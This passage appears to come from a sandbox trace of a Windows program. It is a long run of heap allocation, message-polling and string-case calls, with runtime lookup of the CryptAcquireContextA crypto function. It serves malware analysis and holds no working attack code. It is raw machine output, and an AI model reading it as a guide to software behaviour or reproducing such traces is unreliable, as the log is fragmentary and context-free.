lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.732] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0199.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0199.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0199.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.745] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0199.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.747] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.749] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.750] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.752] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0199.752] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.753] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0199.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.753] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.753] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.754] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.754] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.754] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.755] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.756] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0199.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.756] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0199.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.757] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.758] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.759] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.759] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.759] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.759] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.759] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.760] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 